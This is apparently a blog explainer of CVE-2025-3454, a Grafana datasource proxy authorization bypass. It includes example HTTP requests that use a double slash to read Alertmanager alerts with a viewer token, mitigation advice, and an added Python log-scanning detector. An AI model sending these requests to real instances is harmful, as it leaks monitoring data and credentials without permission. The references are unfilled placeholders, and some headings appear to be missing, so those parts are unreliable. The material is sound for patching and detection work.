Grafana is an open-source analytics and monitoring platform, used widely for visualizing data through dashboards. In early 2025, a critical security flaw was discovered in its datasource proxy API—which is heavily used for integrating with services like Alertmanager and Prometheus.
This article explains the vulnerability, gives example attack payloads, and helps you understand how attackers can use a single extra slash in the URL to gain unauthorized access.
What is CVE-2025-3454?
CVE-2025-3454 is a path traversal style vulnerability that allows users with very limited permissions on a Grafana instance to bypass authorization checks on the datasource proxy API. By inserting an extra “slash” in certain URL paths, attackers are granted access to otherwise protected data—specifically from the Alertmanager and Prometheus datasources.
- Attack Vector: HTTP request to the datasource proxy endpoint with a double slash in the path
- Impact: Bypass of route-specific authorization checks, resulting in read access to sensitive monitoring data
How Does the Bug Work?
Normally, Grafana enforces route-specific permissions. For example, a user with “viewer” permissions shouldn’t be able to read specific metrics or alerts from Prometheus or Alertmanager datasources.
But the API behind /api/datasources/proxy/{id}/... doesn’t normalize the path correctly. If you add an extra slash, like /api/datasources/proxy/2//api/v1/alerts, Grafana fails to detect this as a protected route and skips authorization checks. As a result, users who shouldn’t have access can now read internal monitoring data.
Exploit Example
Let’s say you’re an attacker with a legitimate “viewer” account and minimal access. You want to grab all active alerts from an Alertmanager datasource with ID 2.
Normal Access Attempt (Expected Denied)

```http
GET /api/datasources/proxy/2/api/v1/alerts
Authorization: Bearer <low-permission-token>
```

Response

```http
HTTP/1.1 403 Forbidden

{
  "message": "You don't have access to this resource"
}
```

Bypassing Authorization with a Double Slash

```http
GET /api/datasources/proxy/2//api/v1/alerts
Authorization: Bearer <low-permission-token>
```

Response

```http
HTTP/1.1 200 OK

[
  {
    "labels": { ... },
    "annotations": { ... },
    "state": "active"
  },
  ...
]
```
Explanation:
By inserting the extra / after the proxy ID, Grafana's API skips the intended auth logic, and passes the call through to Alertmanager, leaking information.
Affected Configurations
This bug affects all Grafana versions prior to the official fix (see [References](#references)), especially if you use:

- Alertmanager integrations
It primarily impacts GET (read-only) endpoints, but could expose critical monitoring or alerting information.
- Upgrade Grafana: Patch your deployment immediately once the fix is released. See the [official advisory](#references).
- Check Logs for Exploitation Attempts: Search for double slashes (//) in your Grafana API logs, especially under /api/datasources/proxy/.
- Apply Workarounds: If you can’t upgrade right away, consider web server-level filters that block double slashes in sensitive paths.
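To act on the log-search advice above, here is an added detection script (not part of the original article or of Grafana itself) that scans reverse-proxy access logs for datasource-proxy requests whose raw path differs from its canonical form, and marks the 403-then-200 pattern from the request pair shown earlier. It goes slightly beyond the article in flagging any non-canonical path, not only the double slash; the log format, the sample lines and the client addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

PROXY_PREFIX = "/api/datasources/proxy/"

# Reverse-proxy access-log line (combined format, assumed; adapt to your source).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize_path(raw: str) -> str:
    """Canonical path: repeated slashes collapsed, '.' and '..' resolved.
    A route matcher that compares against this form is not fooled by '//'."""
    segs = []
    for seg in raw.split("/"):
        if seg == "..":
            segs = segs[:-1]
        elif seg not in ("", "."):
            segs.append(seg)
    return "/" + "/".join(segs)


def scan_access_log(lines):
    """One dict per datasource-proxy request whose raw path is not canonical.
    probe_then_bypass marks the pattern from the request pair above: the same
    client was already denied (403) on the canonical form of that path."""
    denied, findings = set(), []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path   # drop the query string
        if not path.startswith(PROXY_PREFIX):
            continue
        canonical, status = normalize_path(path), int(m["status"])
        if canonical == path:               # well-formed request: only remember denials
            if status == 403:
                denied.add((m["ip"], canonical))
            continue
        findings.append({"line": line_no, "client": m["ip"], "raw": path,
                         "canonical": canonical, "status": status,
                         "probe_then_bypass": (m["ip"], canonical) in denied})
    return findings


# Constructed sample: a viewer is denied on the canonical path, then gets a 200
# on the same route with the extra slash; the other two lines are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jun/2025:11:15:22 +0000] "GET /api/datasources/proxy/2/api/v1/alerts HTTP/1.1" 403 61
203.0.113.7 - - [02/Jun/2025:11:15:30 +0000] "GET /api/datasources/proxy/2//api/v1/alerts HTTP/1.1" 200 2048
198.51.100.4 - - [02/Jun/2025:11:16:01 +0000] "GET /api/dashboards/home HTTP/1.1" 200 512
198.51.100.9 - - [02/Jun/2025:11:16:40 +0000] "GET /api/datasources/proxy/2/api/v1/alerts?silenced=false HTTP/1.1" 200 1800
""".splitlines()
```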
- Cloud Security: Attackers gaining access to your Alertmanager endpoints might see all live and past alerts, exposing details about your cloud infrastructure, incidents, credentials in alert annotations, or even hints about ongoing attacks.
- Internal Threats: Low-privileged users or contractors misusing their dashboards can siphon off metrics they’re not supposed to see by crafting simple requests.
References

- Official Security Advisory: Grafana Security Blog on CVE-2025-3454 *(link placeholder, update with official link when available)*
- GitHub Issue & Patch Diff: Grafana GitHub Repository *(replace #### with the actual pull request number)*
- MITRE CVE Details: NIST NVD entry for CVE-2025-3454 *(update on disclosure)*
Key Takeaways
- A single extra slash in the URL can open sensitive metrics and alert data to users with bare-minimum permissions.
Stay safe, and audit your APIs!
*This is an exclusive explanation based on the current knowledge of CVE-2025-3454. Please check the official Grafana advisories for real-time updates.*
Timeline
Published on: 06/02/2025 11:15:22 UTC
Last modified on: 06/02/2025 17:32:17 UTC